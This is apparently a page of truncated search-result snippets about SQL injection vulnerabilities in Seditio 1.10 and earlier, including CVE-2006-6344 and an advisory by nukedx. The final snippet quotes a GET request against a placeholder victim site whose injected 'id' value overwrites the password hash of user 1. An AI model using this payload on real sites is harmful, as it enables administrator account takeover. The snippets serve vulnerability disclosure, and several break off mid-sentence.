Seditio <= 1.10 (avatarselect id) Remote SQL Injection Vulnerability

No description provided by source. Seditio = 1.10 Remote SQL Injection avatarselect id Vulnerability Discovered by: nukedx Contacts: ICQ: 10072 MSN/Mail: [email protected] web: http://www.nukedx.com Original advisory can be found at: http://www.nukedx.com/?viewdoc=52 ---- GET -...

CVE-2006-6344

Multiple unspecified vulnerabilities in Neocrome Seditio 1.10 and earlier have unknown impact and attack vectors related to 1 plugins/ipsearch/ipsearch.admin.php, and 2 pfs/pfs.edit.inc.php, 3 users/users.register.inc.php in system/core. NOTE: the users.profile.inc.php vector is identified by...

seditio110.txt

--Security Report-- Advisory: Seditio http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gifSQL...

Seditio 1.10 - avatarselect id SQL Injection

Seditio 1.10 - avatarselect id SQL Injection Seditio http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gifSQL Inject GET -...

Seditio 1.10 - &#039;Users.Profile.Inc.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/21232/info Seditio is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,...

Seditio 1.10 - avatarselect id SQL Injection

Seditio http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gifSQL Inject GET - http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,userpassword=%2527e10adc3949ba59abbe56e057f20f883e%2527//where//userid=1/ with this example remote...